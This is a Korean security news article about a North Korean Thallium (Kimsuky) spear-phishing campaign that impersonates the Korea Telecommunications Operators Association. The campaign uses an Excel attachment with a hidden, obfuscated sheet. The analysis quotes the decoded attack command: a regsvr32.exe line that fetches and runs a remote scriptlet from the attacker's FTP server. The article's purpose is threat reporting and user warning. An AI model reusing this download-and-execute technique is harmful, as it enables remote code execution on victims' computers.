[보안뉴스 원병철 기자] 최근 한국통신사업자연합회(KTOA)를 사칭한 북한의 사이버 공격그룹 탈륨의 스피어피싱 공격이 발견됐다. 이스트시큐리티 ESRC(시큐리티대응센터)는 ‘불법사용 전화번호 이용중지시스템(UNMS) 이용자 점검 안내’라는 제목의 악성 메일이 유포되고 있다고 밝혔다.
▲‘불법사용 전화번호 이용중지시스템(UNMS) 이용자 점검 안내’ 제목으로 유포중인 피싱 메일[자료=ESRC]
발견된 해당 파일에 대해 분석해본 결과 APT 조직인 탈륨(Thallium, 또는 김수키라고도 부름)의 활동으로 확인됐다. 탈륨은 한국의 정부 및 주요기관의 정보유출을 타깃으로 하는 APT 조직으로, 최근에도 활발한 공격활동을 진행 중이다.
이번에 발견된 악성 메일은 한국통신사업자연합회(KTOA)를 사칭하고 있으며, 익성 메일은 ‘불법사용 전화번호 이용중지시스템(UNMS) 이용자 점검 안내’라는 제목과 함께 ‘불법사용 전화번호 이용중지시스템(UNMS) 사용자 현황 조사_양식’이란 파일명의 압축파일이 포함되어 있다.
▲피싱 메일 내 포함되어 있는 첨부파일[자료=ESRC]
압축파일 내에는 엑셀 파일이 포함되어 있다. 엑셀 파일을 열면, Office 업데이트 사용 가능이라는 내용이 보이며 사용자로 하여금 콘텐츠 사용 버튼을 누르도록 유도한다. 콘텐츠 사용을 클릭하면 실제 불법사용 전화번호 이용중지시스템(UNMS) 사용자 현황 조사처럼 위장한 엑셀 화면이 보인다.
그렇기 때문에 일반 사용자들은 어떠한 이상한 점도 발견하지 못한다. 하지만 엑셀 파일 내에는, 다음과 같은 시트가 숨겨져 있다. 숨겨진 시트 안에는 명령어와 명령제어(C2) 서버 정보가 각각 다른 셀에 작성되어 있는 난독화 방식이 적용되어 있다.
▲숨겨진 셀에 난독화 되어있는 명령어[자료=ESRC]
난독화 된 문자열을 모두 해석하면 regsvr32.exe 명령을 통해 공격자가 지정한 FTP 서버로 접속하게 되며, Script Component Runtime 인자 등을 통해 호출한다.
regsvr32.exe /u /n /s /i:ftp//tinker:belldcl5.kamika2e[.]com/sonygroup.fla scrobj.dll
이 루틴으로 URL(FTP) 주소에 있는 임의의 악성 스크립트를 실행할 수 있고, 공격자의 의도에 따라 언제든지 추가 공격이 가능하다.
실제 ‘불법사용 전화번호 이용중지시스템(UNMS) 사용자 현황 조사_양식.xlsb’ 파일은 내부 매크로 시트에 코드가 포함되어 있다.
▲악성 파일 내 포함된 매크로[자료=ESRC]
해당 문서는 이미 올해 초 한차례 유포된 적이 있으며, 이번에 발견된 문서는 내부 C2 주소만 바뀌어 재 유포됐다.
ESRC는 국내의 기업 및 기관들을 대상으로 한 탈륨(Thallium) 조직의 공격은 지속되고 있으며, 공격 방식 역시 점점 더 정교해지고 위협적으로 진화하고 있다면서, 의심스러운 문서파일 열람 시 ‘콘텐츠 사용’ 클릭을 지양해 줄 것을 당부했다.
[원병철 기자(boanone@boannews.com)]
<저작권자: 보안뉴스(www.boannews.com) 무단전재-재배포금지>